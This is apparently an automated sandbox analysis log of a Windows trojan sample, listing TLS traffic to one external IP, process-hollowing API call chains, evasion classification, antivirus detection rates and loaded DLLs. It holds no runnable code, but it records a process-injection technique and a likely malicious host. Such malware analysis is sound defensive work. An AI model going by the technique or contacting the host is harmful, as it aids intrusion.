            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
            Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
            Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
            Source: unknownHTTPS traffic detected: 68.178.157.109:443 -> 192.168.2.9:49706 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 68.178.157.109:443 -> 192.168.2.9:49708 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 68.178.157.109:443 -> 192.168.2.9:49710 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 68.178.157.109:443 -> 192.168.2.9:49712 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 68.178.157.109:443 -> 192.168.2.9:49714 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 68.178.157.109:443 -> 192.168.2.9:49716 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 68.178.157.109:443 -> 192.168.2.9:49718 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 68.178.157.109:443 -> 192.168.2.9:49720 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 68.178.157.109:443 -> 192.168.2.9:49727 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 68.178.157.109:443 -> 192.168.2.9:49732 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 68.178.157.109:443 -> 192.168.2.9:49734 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 68.178.157.109:443 -> 192.168.2.9:49736 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 68.178.157.109:443 -> 192.168.2.9:49738 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 68.178.157.109:443 -> 192.168.2.9:49740 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 68.178.157.109:443 -> 192.168.2.9:49742 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 68.178.157.109:443 -> 192.168.2.9:49744 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 68.178.157.109:443 -> 192.168.2.9:49746 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 68.178.157.109:443 -> 192.168.2.9:49748 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 68.178.157.109:443 -> 192.168.2.9:49750 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 68.178.157.109:443 -> 192.168.2.9:49752 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 68.178.157.109:443 -> 192.168.2.9:49754 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 68.178.157.109:443 -> 192.168.2.9:49756 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 68.178.157.109:443 -> 192.168.2.9:49758 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 68.178.157.109:443 -> 192.168.2.9:49760 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 68.178.157.109:443 -> 192.168.2.9:49762 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 68.178.157.109:443 -> 192.168.2.9:49764 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 68.178.157.109:443 -> 192.168.2.9:49766 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 68.178.157.109:443 -> 192.168.2.9:49769 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 68.178.157.109:443 -> 192.168.2.9:49771 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 68.178.157.109:443 -> 192.168.2.9:49773 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 68.178.157.109:443 -> 192.168.2.9:49775 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 68.178.157.109:443 -> 192.168.2.9:49777 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 68.178.157.109:443 -> 192.168.2.9:49779 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 68.178.157.109:443 -> 192.168.2.9:49781 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 68.178.157.109:443 -> 192.168.2.9:49783 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 68.178.157.109:443 -> 192.168.2.9:49785 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 68.178.157.109:443 -> 192.168.2.9:49787 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 68.178.157.109:443 -> 192.168.2.9:49789 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 68.178.157.109:443 -> 192.168.2.9:49791 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 68.178.157.109:443 -> 192.168.2.9:49794 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 68.178.157.109:443 -> 192.168.2.9:49796 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 68.178.157.109:443 -> 192.168.2.9:49798 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 68.178.157.109:443 -> 192.168.2.9:49800 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 68.178.157.109:443 -> 192.168.2.9:49802 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 68.178.157.109:443 -> 192.168.2.9:49804 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 68.178.157.109:443 -> 192.168.2.9:49806 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 68.178.157.109:443 -> 192.168.2.9:49808 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 68.178.157.109:443 -> 192.168.2.9:49810 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 68.178.157.109:443 -> 192.168.2.9:49812 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 68.178.157.109:443 -> 192.168.2.9:49814 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 68.178.157.109:443 -> 192.168.2.9:49816 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 68.178.157.109:443 -> 192.168.2.9:49818 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 68.178.157.109:443 -> 192.168.2.9:49820 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 68.178.157.109:443 -> 192.168.2.9:49822 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 68.178.157.109:443 -> 192.168.2.9:49824 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 68.178.157.109:443 -> 192.168.2.9:49826 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 68.178.157.109:443 -> 192.168.2.9:49828 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 68.178.157.109:443 -> 192.168.2.9:49830 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 68.178.157.109:443 -> 192.168.2.9:49832 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 68.178.157.109:443 -> 192.168.2.9:49834 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 68.178.157.109:443 -> 192.168.2.9:49836 version: TLS 1.2
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeCode function: 0_2_0281C4DC RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,0_2_0281C4DC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeCode function: 0_2_0281C3F6 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,0_2_0281C3F6
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeCode function: 0_2_0281C3F8 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,0_2_0281C3F8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeCode function: 0_2_0281C368 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_0281C368
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeCode function: 0_2_02817AC0 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,0_2_02817AC0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeCode function: 0_2_02817F46 CreateProcessAsUserW,GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,NtResumeThread,0_2_02817F46
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeCode function: 0_2_02817F48 CreateProcessAsUserW,GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,NtResumeThread,0_2_02817F48
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeCode function: 0_2_0281CA6C CreateProcessAsUserW,WaitForSingleObject,CloseHandle,CloseHandle,0_2_0281CA6C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeCode function: 0_2_028020C40_2_028020C4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeCode function: String function: 02817BE8 appears 45 times
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeCode function: String function: 02804824 appears 883 times
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeCode function: String function: 028044A0 appears 67 times
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeCode function: String function: 02806658 appears 32 times
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeCode function: String function: 02804698 appears 247 times
            Source: SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeBinary or memory string: OriginalFilename vs SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
            Source: SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe, 00000000.00000002.2693673726.0000000020581000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameStoreInstaller.exe@ vs SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
            Source: SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe, 00000000.00000000.1436807600.00000000004DF000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameStoreInstaller.exe@ vs SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
            Source: SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe, 00000000.00000002.2679906356.0000000002800000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
            Source: SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe, 00000000.00000002.2693673726.00000000205BC000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameStoreInstaller.exe@ vs SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
            Source: SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe, 00000000.00000003.1445172180.000000007F6E8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameStoreInstaller.exe@ vs SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
            Source: SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe, 00000000.00000003.1445172180.000000007F620000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameStoreInstaller.exe@ vs SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
            Source: SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe, 00000000.00000003.1439006094.000000007FD80000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
            Source: SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeBinary or memory string: OriginalFilenameStoreInstaller.exe@ vs SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
            Source: SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
            Source: classification engineClassification label: mal88.troj.evad.winEXE@1/0@1/1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeCode function: 0_2_02807F8E GetDiskFreeSpaceA,0_2_02807F8E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeCode function: 0_2_02816D84 CoCreateInstance,0_2_02816D84
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeReversingLabs: Detection: 36%
            Source: SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeVirustotal: Detection: 43%
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: acgenral.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: msacm32.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: winmmbase.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: winmmbase.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: url.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: endpointdlp.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: eamsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: smartscreenps.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ???y.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ???y.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ???y.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ????.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ????.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ????.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ???2.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ???2.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ???2.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ???.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ???.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ???.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??????s.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??????s.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??????s.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeSection loaded: ??.dllJump to behavior
